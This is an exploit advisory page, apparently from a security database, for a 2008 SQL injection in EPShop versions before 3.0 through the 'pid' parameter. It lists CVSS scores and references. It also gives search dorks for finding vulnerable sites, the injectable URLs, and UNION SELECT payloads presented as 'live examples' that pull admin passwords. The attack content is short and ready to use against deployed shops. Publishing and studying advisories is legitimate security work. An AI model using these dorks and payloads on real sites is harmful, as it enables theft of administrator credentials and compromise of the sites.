EPShop < 3.0 (pid) Remote SQL Injection Vulnerability

2008.08.02
Credit: mikeX
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

######################################################################################## # # [+] Name : EPShop < 3.0 (pid) Remote SQL Injection Vulnerability # [+] Author : mikeX - http://www.cyber-underground.net / m$n: mikeX[at]fuckoff[dot]com # [+] Dork(s): ?action=pro_show and ?action=disppro # [+] Greetz : Ciaran McG, -Witch-Doct0r, K_n, MegaByte, Squibs, cIpheR, mmmbud, RoMeo # ######################################################################################## Information; You can't download a copy coz it's now known as ECShop - http://comsenz.com/products/ecshop They stopped supporting the old version a while ago. Exploit; SQL #1: http://www.target.com/?action=pro_show&pid=[SQL Injection] SQL #2: http://www.target.com/?action=disppro&pid=[SQL Injection] Live Examples; http://www.xxx.net/?action=pro_show&pid=null+UNION+ALL+SELECT+1,password,3,4,5,6+FROM+admin-- http://www.xxx.com/?action=disppro&pid=null+UNION+ALL+SELECT+1,password,3,4,5,6,7,8,9,10,11,12,13+FROM+admin--

References:

http://xforce.iss.net/xforce/xfdb/44025
http://www.securityfocus.com/bid/30387
http://www.milw0rm.com/exploits/6139


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top